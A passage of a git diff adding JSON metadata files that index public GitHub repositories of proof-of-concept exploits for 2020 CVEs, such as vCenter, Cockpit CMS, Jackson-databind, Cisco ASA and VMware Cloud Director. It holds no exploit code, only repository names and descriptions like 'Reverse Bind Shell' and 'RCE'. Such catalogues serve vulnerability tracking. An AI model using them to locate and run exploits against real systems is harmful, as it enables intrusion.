"catatonicprime", + "id": 2341167, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2341167?v=4", + "html_url": "https:\/\/github.com\/catatonicprime", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/catatonicprime\/CVE-2020-3580", + "description": "Additional exploits for XSS in Cisco ASA devices discovered by PTSwarm", + "fork": false, + "created_at": "2022-07-15T00:11:29Z", + "updated_at": "2023-09-25T07:42:05Z", + "pushed_at": "2022-07-15T01:44:34Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-35846.json b/2020/CVE-2020-35846.json new file mode 100644 index 0000000000..bbd1a8d743 --- /dev/null +++ b/2020/CVE-2020-35846.json @@ -0,0 +1,64 @@ +[ + { + "id": 389266363, + "name": "CVE-2020-35846", + "full_name": "JohnHammond\/CVE-2020-35846", + "owner": { + "login": "JohnHammond", + "id": 6288722, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6288722?v=4", + "html_url": "https:\/\/github.com\/JohnHammond", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JohnHammond\/CVE-2020-35846", + "description": "Python PoC for CVE-2020-35846 targeting Cockpit 0.11.1", + "fork": false, + "created_at": "2021-07-25T05:05:14Z", + "updated_at": "2024-08-12T20:14:58Z", + "pushed_at": "2021-07-25T05:28:51Z", + "stargazers_count": 15, + "watchers_count": 15, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 15, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 393142417, + "name": "CVE-2020-35846", + "full_name": "0z09e\/CVE-2020-35846", + "owner": { + "login": "0z09e", + "id": 62566206, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62566206?v=4", + "html_url": "https:\/\/github.com\/0z09e", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0z09e\/CVE-2020-35846", + "description": "Cockpit CMS 0.11.1 NoSQL Injection to Remote Code Execution", + "fork": false, + "created_at": "2021-08-05T18:48:52Z", + "updated_at": "2024-10-08T14:37:47Z", + "pushed_at": "2021-08-06T14:00:14Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-35847.json b/2020/CVE-2020-35847.json new file mode 100644 index 0000000000..787ddae640 --- /dev/null +++ b/2020/CVE-2020-35847.json @@ -0,0 +1,33 @@ +[ + { + "id": 393324498, + "name": "CVE-2020-35847_CVE-2020-35848", + "full_name": "w33vils\/CVE-2020-35847_CVE-2020-35848", + "owner": { + "login": "w33vils", + "id": 31278671, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31278671?v=4", + "html_url": "https:\/\/github.com\/w33vils", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/w33vils\/CVE-2020-35847_CVE-2020-35848", + "description": "CVE-2020-35847, CVE-2020-35848 : Account Takeover", + "fork": false, + "created_at": "2021-08-06T09:19:01Z", + "updated_at": "2021-08-06T10:53:15Z", + "pushed_at": "2022-11-18T08:47:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-36079.json b/2020/CVE-2020-36079.json new file mode 100644 index 0000000000..22d56d68c2 --- /dev/null +++ b/2020/CVE-2020-36079.json @@ -0,0 +1,33 @@ +[ + { + "id": 337797858, + "name": "CVE-2020-36079.", + "full_name": "azizalshammari\/CVE-2020-36079.", + "owner": { + "login": "azizalshammari", + "id": 63168519, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63168519?v=4", + "html_url": "https:\/\/github.com\/azizalshammari", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/azizalshammari\/CVE-2020-36079.", + "description": null, + "fork": false, + "created_at": "2021-02-10T17:21:10Z", + "updated_at": "2021-03-03T14:34:32Z", + "pushed_at": "2021-02-10T17:25:39Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-36109.json b/2020/CVE-2020-36109.json new file mode 100644 index 0000000000..5c5605090f --- /dev/null +++ b/2020/CVE-2020-36109.json @@ -0,0 +1,64 @@ +[ + { + "id": 338611856, + "name": "CVE-2020-36109-POC", + "full_name": "tin-z\/CVE-2020-36109-POC", + "owner": { + "login": "tin-z", + "id": 32848129, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32848129?v=4", + "html_url": "https:\/\/github.com\/tin-z", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tin-z\/CVE-2020-36109-POC", + "description": "PoC DoS CVE-2020-36109", + "fork": false, + "created_at": "2021-02-13T16:03:36Z", + "updated_at": "2023-01-22T17:22:27Z", + "pushed_at": "2023-01-22T16:56:16Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 483797917, + "name": "CVE-2020-36109-POC", + "full_name": "sunn1day\/CVE-2020-36109-POC", + "owner": { + "login": "sunn1day", + "id": 99871004, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99871004?v=4", + "html_url": "https:\/\/github.com\/sunn1day", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sunn1day\/CVE-2020-36109-POC", + "description": "CVE-2020-36109 PoC causing DoS", + "fork": false, + "created_at": "2022-04-20T20:07:51Z", + "updated_at": "2024-08-12T20:22:37Z", + "pushed_at": "2022-04-20T20:10:11Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 14, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-36179.json b/2020/CVE-2020-36179.json new file mode 100644 index 0000000000..4fb45e0281 --- /dev/null +++ b/2020/CVE-2020-36179.json @@ -0,0 +1,38 @@ +[ + { + "id": 328321384, + "name": "CVE-2020-36179", + "full_name": "Al1ex\/CVE-2020-36179", + "owner": { + "login": "Al1ex", + "id": 38161463, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38161463?v=4", + "html_url": "https:\/\/github.com\/Al1ex", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Al1ex\/CVE-2020-36179", + "description": "CVE-2020-36179~82 Jackson-databind SSRF&RCE", + "fork": false, + "created_at": "2021-01-10T06:47:49Z", + "updated_at": "2024-11-21T13:11:40Z", + "pushed_at": "2021-01-10T06:48:53Z", + "stargazers_count": 80, + "watchers_count": 80, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2020-36179", + "jackson-databind", + "rce", + "ssrf" + ], + "visibility": "public", + "forks": 9, + "watchers": 80, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-36184.json b/2020/CVE-2020-36184.json new file mode 100644 index 0000000000..1e3c4efbb1 --- /dev/null +++ b/2020/CVE-2020-36184.json @@ -0,0 +1,33 @@ +[ + { + "id": 328567970, + "name": "CVE-2020-36184", + "full_name": "Al1ex\/CVE-2020-36184", + "owner": { + "login": "Al1ex", + "id": 38161463, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38161463?v=4", + "html_url": "https:\/\/github.com\/Al1ex", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Al1ex\/CVE-2020-36184", + "description": "CVE-2020-36184 && Jackson-databind RCE", + "fork": false, + "created_at": "2021-01-11T06:22:25Z", + "updated_at": "2024-08-12T20:09:18Z", + "pushed_at": "2021-01-11T06:22:44Z", + "stargazers_count": 15, + "watchers_count": 15, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 15, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-36188.json b/2020/CVE-2020-36188.json new file mode 100644 index 0000000000..9527850bd4 --- /dev/null +++ b/2020/CVE-2020-36188.json @@ -0,0 +1,37 @@ +[ + { + "id": 328569446, + "name": "CVE-2020-36188", + "full_name": "Al1ex\/CVE-2020-36188", + "owner": { + "login": "Al1ex", + "id": 38161463, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38161463?v=4", + "html_url": "https:\/\/github.com\/Al1ex", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Al1ex\/CVE-2020-36188", + "description": "CVE-2020-36188 &&Jackson-databind RCE", + "fork": false, + "created_at": "2021-01-11T06:29:38Z", + "updated_at": "2024-08-12T20:09:18Z", + "pushed_at": "2021-01-11T06:29:59Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2020-36188", + "jackson-databind", + "rce" + ], + "visibility": "public", + "forks": 2, + "watchers": 11, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-36287.json b/2020/CVE-2020-36287.json new file mode 100644 index 0000000000..ca02087a01 --- /dev/null +++ b/2020/CVE-2020-36287.json @@ -0,0 +1,40 @@ +[ + { + "id": 391787530, + "name": "CVE-2020-36287", + "full_name": "f4rber\/CVE-2020-36287", + "owner": { + "login": "f4rber", + "id": 53954664, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53954664?v=4", + "html_url": "https:\/\/github.com\/f4rber", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/f4rber\/CVE-2020-36287", + "description": "The dashboard gadgets preference resource of the Atlassian gadgets plugin used in Jira Server and Jira Data Center before version 8.13.5, and from version 8.14.0 before version 8.15.1 allows remote anonymous attackers to obtain gadget related settings via a missing permissions check.", + "fork": false, + "created_at": "2021-08-02T01:52:39Z", + "updated_at": "2023-03-30T02:40:48Z", + "pushed_at": "2021-08-08T16:26:11Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "atlassian", + "bruteforce", + "cve-2020-36287", + "enumeration", + "jira", + "python3" + ], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-36518.json b/2020/CVE-2020-36518.json new file mode 100644 index 0000000000..819e4f06e9 --- /dev/null +++ b/2020/CVE-2020-36518.json @@ -0,0 +1,33 @@ +[ + { + "id": 472514562, + "name": "boot-jackson-cve", + "full_name": "ghillert\/boot-jackson-cve", + "owner": { + "login": "ghillert", + "id": 685363, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/685363?v=4", + "html_url": "https:\/\/github.com\/ghillert", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ghillert\/boot-jackson-cve", + "description": "Reproduction of CVE-2020-36518 in Spring Boot 2.5.10", + "fork": false, + "created_at": "2022-03-21T21:13:28Z", + "updated_at": "2022-03-21T22:09:38Z", + "pushed_at": "2022-03-21T22:16:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-36603.json b/2020/CVE-2020-36603.json new file mode 100644 index 0000000000..91b075ec8c --- /dev/null +++ b/2020/CVE-2020-36603.json @@ -0,0 +1,33 @@ +[ + { + "id": 588098305, + "name": "CVE-2020-36603", + "full_name": "gmh5225\/CVE-2020-36603", + "owner": { + "login": "gmh5225", + "id": 13917777, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13917777?v=4", + "html_url": "https:\/\/github.com\/gmh5225", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gmh5225\/CVE-2020-36603", + "description": "The HoYoVerse (formerly miHoYo) Genshin Impact mhyprot2.sys 1.0.0.0 anti-cheat driver does not adequately restrict unprivileged function calls, allowing local, unprivileged users to execute arbitrary code with SYSTEM privileges on Microsoft Windows systems. The mhyprot2.sys driver must first be installed by a user with CVE project by @Sn0wAlice", + "fork": false, + "created_at": "2023-01-12T10:17:58Z", + "updated_at": "2024-09-11T15:31:26Z", + "pushed_at": "2022-12-29T16:45:49Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-36730.json b/2020/CVE-2020-36730.json new file mode 100644 index 0000000000..b1dd9eb076 --- /dev/null +++ b/2020/CVE-2020-36730.json @@ -0,0 +1,33 @@ +[ + { + "id": 762344527, + "name": "CVE-2020-36730", + "full_name": "RandomRobbieBF\/CVE-2020-36730", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2020-36730", + "description": "CMP - Coming Soon & Maintenance < 3.8.2 - Improper Access Controls on AJAX Calls (Subscriber+)", + "fork": false, + "created_at": "2024-02-23T15:29:41Z", + "updated_at": "2024-07-11T16:38:47Z", + "pushed_at": "2024-02-23T15:35:02Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-36732.json b/2020/CVE-2020-36732.json new file mode 100644 index 0000000000..2fce027b10 --- /dev/null +++ b/2020/CVE-2020-36732.json @@ -0,0 +1,64 @@ +[ + { + "id": 786354798, + "name": "CVE-2020-36732-2", + "full_name": "miguelc49\/CVE-2020-36732-2", + "owner": { + "login": "miguelc49", + "id": 158234444, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/158234444?v=4", + "html_url": "https:\/\/github.com\/miguelc49", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/miguelc49\/CVE-2020-36732-2", + "description": null, + "fork": false, + "created_at": "2024-04-14T07:39:33Z", + "updated_at": "2024-04-14T17:38:36Z", + "pushed_at": "2024-04-14T17:38:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 786354812, + "name": "CVE-2020-36732-1", + "full_name": "miguelc49\/CVE-2020-36732-1", + "owner": { + "login": "miguelc49", + "id": 158234444, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/158234444?v=4", + "html_url": "https:\/\/github.com\/miguelc49", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/miguelc49\/CVE-2020-36732-1", + "description": null, + "fork": false, + "created_at": "2024-04-14T07:39:36Z", + "updated_at": "2024-04-14T17:38:33Z", + "pushed_at": "2024-04-22T01:18:08Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-3766.json b/2020/CVE-2020-3766.json new file mode 100644 index 0000000000..eb23badf28 --- /dev/null +++ b/2020/CVE-2020-3766.json @@ -0,0 +1,33 @@ +[ + { + "id": 252148674, + "name": "CVE-2020-3766_APSB20-12", + "full_name": "hessandrew\/CVE-2020-3766_APSB20-12", + "owner": { + "login": "hessandrew", + "id": 45692132, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45692132?v=4", + "html_url": "https:\/\/github.com\/hessandrew", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hessandrew\/CVE-2020-3766_APSB20-12", + "description": "https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2020-3766", + "fork": false, + "created_at": "2020-04-01T10:55:31Z", + "updated_at": "2024-08-12T19:59:34Z", + "pushed_at": "2020-04-01T10:55:56Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-3952.json b/2020/CVE-2020-3952.json new file mode 100644 index 0000000000..ab47480295 --- /dev/null +++ b/2020/CVE-2020-3952.json @@ -0,0 +1,157 @@ +[ + { + "id": 255764753, + "name": "CVE-2020-3952", + "full_name": "chronoloper\/CVE-2020-3952", + "owner": { + "login": "chronoloper", + "id": 46551775, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46551775?v=4", + "html_url": "https:\/\/github.com\/chronoloper", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/chronoloper\/CVE-2020-3952", + "description": "Vuln Check", + "fork": false, + "created_at": "2020-04-15T00:51:21Z", + "updated_at": "2024-08-12T20:00:12Z", + "pushed_at": "2020-04-15T22:23:57Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 256080140, + "name": "CVE-2020-3952", + "full_name": "bb33bb\/CVE-2020-3952", + "owner": { + "login": "bb33bb", + "id": 5463104, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5463104?v=4", + "html_url": "https:\/\/github.com\/bb33bb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bb33bb\/CVE-2020-3952", + "description": "Working Exploit PoC for VMWare vCenter Server (CVE-2020-3952) - Reverse Bind Shell", + "fork": false, + "created_at": "2020-04-16T01:39:33Z", + "updated_at": "2024-08-12T20:00:15Z", + "pushed_at": "2020-04-15T00:13:59Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 6, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 256143992, + "name": "vmware_vcenter_cve_2020_3952", + "full_name": "guardicore\/vmware_vcenter_cve_2020_3952", + "owner": { + "login": "guardicore", + "id": 5675395, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5675395?v=4", + "html_url": "https:\/\/github.com\/guardicore", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/guardicore\/vmware_vcenter_cve_2020_3952", + "description": "Exploit for CVE-2020-3952 in vCenter 6.7", + "fork": false, + "created_at": "2020-04-16T07:40:51Z", + "updated_at": "2024-11-07T04:29:45Z", + "pushed_at": "2020-04-16T08:38:42Z", + "stargazers_count": 270, + "watchers_count": 270, + "has_discussions": false, + "forks_count": 60, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 60, + "watchers": 270, + "score": 0, + "subscribers_count": 12 + }, + { + "id": 256499271, + "name": "CVE-2020-3952", + "full_name": "gelim\/CVE-2020-3952", + "owner": { + "login": "gelim", + "id": 179122, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/179122?v=4", + "html_url": "https:\/\/github.com\/gelim", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gelim\/CVE-2020-3952", + "description": "VMWare vmdir missing access control exploit checker", + "fork": false, + "created_at": "2020-04-17T12:39:31Z", + "updated_at": "2024-08-12T20:00:22Z", + "pushed_at": "2020-04-17T17:09:06Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 257074392, + "name": "vmware_vcenter_cve_2020_3952", + "full_name": "Fa1c0n35\/vmware_vcenter_cve_2020_3952", + "owner": { + "login": "Fa1c0n35", + "id": 33335488, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33335488?v=4", + "html_url": "https:\/\/github.com\/Fa1c0n35", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Fa1c0n35\/vmware_vcenter_cve_2020_3952", + "description": "Exploit for CVE-2020-3952 in vCenter 6.7 https:\/\/www.guardicore.com\/2020\/04\/pwning-vmware-vcenter-cve-2020-3952\/", + "fork": false, + "created_at": "2020-04-19T18:35:13Z", + "updated_at": "2024-08-12T20:00:27Z", + "pushed_at": "2020-04-19T18:35:22Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-3956.json b/2020/CVE-2020-3956.json new file mode 100644 index 0000000000..c12f9078d3 --- /dev/null +++ b/2020/CVE-2020-3956.json @@ -0,0 +1,33 @@ +[ + { + "id": 268600447, + "name": "CVE-2020-3956", + "full_name": "aaronsvk\/CVE-2020-3956", + "owner": { + "login": "aaronsvk", + "id": 28111712, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28111712?v=4", + "html_url": "https:\/\/github.com\/aaronsvk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/aaronsvk\/CVE-2020-3956", + "description": "PoC exploit for VMware Cloud Director RCE (CVE-2020-3956)", + "fork": false, + "created_at": "2020-06-01T18:26:32Z", + "updated_at": "2024-09-17T19:26:13Z", + "pushed_at": "2020-06-02T08:30:22Z", + "stargazers_count": 89, + "watchers_count": 89, + "has_discussions": false, + "forks_count": 31, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 31, + "watchers": 89, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-3992.json b/2020/CVE-2020-3992.json new file mode 100644 index 0000000000..9d92ead7fb --- /dev/null +++ b/2020/CVE-2020-3992.json @@ -0,0 +1,71 @@ +[ + { + "id": 317555828, + "name": "CVE-2019-5544_CVE-2020-3992", + "full_name": "HynekPetrak\/CVE-2019-5544_CVE-2020-3992", + "owner": { + "login": "HynekPetrak", + "id": 8593983, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8593983?v=4", + "html_url": "https:\/\/github.com\/HynekPetrak", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/HynekPetrak\/CVE-2019-5544_CVE-2020-3992", + "description": "Python \/ scapy module implementing SRVLOC\/SLP protocol and scans for enabled OpenSLP services.", + "fork": false, + "created_at": "2020-12-01T13:49:26Z", + "updated_at": "2024-11-05T07:49:25Z", + "pushed_at": "2023-02-07T07:56:20Z", + "stargazers_count": 47, + "watchers_count": 47, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2019-5544", + "cve-2020-3992", + "cve-2021-21974", + "openslp", + "slp", + "srvloc" + ], + "visibility": "public", + "forks": 12, + "watchers": 47, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 335992894, + "name": "VMware_ESXI_OpenSLP_PoCs", + "full_name": "dgh05t\/VMware_ESXI_OpenSLP_PoCs", + "owner": { + "login": "dgh05t", + "id": 55125726, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55125726?v=4", + "html_url": "https:\/\/github.com\/dgh05t", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dgh05t\/VMware_ESXI_OpenSLP_PoCs", + "description": "CVE-2020-3992 & CVE-2019-5544", + "fork": false, + "created_at": "2021-02-04T15:15:22Z", + "updated_at": "2024-11-20T09:00:47Z", + "pushed_at": "2021-02-05T06:40:50Z", + "stargazers_count": 63, + "watchers_count": 63, + "has_discussions": false, + "forks_count": 22, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 22, + "watchers": 63, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-4040.json b/2020/CVE-2020-4040.json new file mode 100644 index 0000000000..8cb3fecf2f --- /dev/null +++ b/2020/CVE-2020-4040.json @@ -0,0 +1,33 @@ +[ + { + "id": 312934644, + "name": "RCE-Exploit-Bolt-3.7.0-CVE-2020-4040-4041", + "full_name": "jpvispo\/RCE-Exploit-Bolt-3.7.0-CVE-2020-4040-4041", + "owner": { + "login": "jpvispo", + "id": 11736106, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11736106?v=4", + "html_url": "https:\/\/github.com\/jpvispo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jpvispo\/RCE-Exploit-Bolt-3.7.0-CVE-2020-4040-4041", + "description": null, + "fork": false, + "created_at": "2020-11-15T01:23:12Z", + "updated_at": "2020-11-15T01:33:08Z", + "pushed_at": "2020-11-15T01:33:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-4276.json b/2020/CVE-2020-4276.json new file mode 100644 index 0000000000..91e8f06819 --- /dev/null +++ b/2020/CVE-2020-4276.json @@ -0,0 +1,33 @@ +[ + { + "id": 255771164, + "name": "CVE-2020-4276", + "full_name": "mekoko\/CVE-2020-4276", + "owner": { + "login": "mekoko", + "id": 22165228, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22165228?v=4", + "html_url": "https:\/\/github.com\/mekoko", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mekoko\/CVE-2020-4276", + "description": null, + "fork": false, + "created_at": "2020-04-15T01:26:55Z", + "updated_at": "2024-08-12T20:00:12Z", + "pushed_at": "2020-04-15T01:31:16Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 6, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-4463.json b/2020/CVE-2020-4463.json new file mode 100644 index 0000000000..d3d463c252 --- /dev/null +++ b/2020/CVE-2020-4463.json @@ -0,0 +1,39 @@ +[ + { + "id": 287231515, + "name": "CVE-2020-4463", + "full_name": "Ibonok\/CVE-2020-4463", + "owner": { + "login": "Ibonok", + "id": 37837775, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37837775?v=4", + "html_url": "https:\/\/github.com\/Ibonok", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Ibonok\/CVE-2020-4463", + "description": "IBM Maximo Asset Management is vulnerable to Information Disclosure via XXE Vulnerability (CVE-2020-4463)", + "fork": false, + "created_at": "2020-08-13T09:03:40Z", + "updated_at": "2024-08-12T20:04:40Z", + "pushed_at": "2023-09-19T10:38:28Z", + "stargazers_count": 53, + "watchers_count": 53, + "has_discussions": false, + "forks_count": 17, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2020-4463", + "ibm", + "ibm-maximo", + "security", + "security-vulnerability" + ], + "visibility": "public", + "forks": 17, + "watchers": 53, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-4464.json b/2020/CVE-2020-4464.json new file mode 100644 index 0000000000..813e48a37f --- /dev/null +++ b/2020/CVE-2020-4464.json @@ -0,0 +1,64 @@ +[ + { + "id": 397176290, + "name": "WebSphere-WSIF-gadget", + "full_name": "silentsignal\/WebSphere-WSIF-gadget", + "owner": { + "login": "silentsignal", + "id": 4179629, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4179629?v=4", + "html_url": "https:\/\/github.com\/silentsignal", + "user_view_type": "public" + }, + 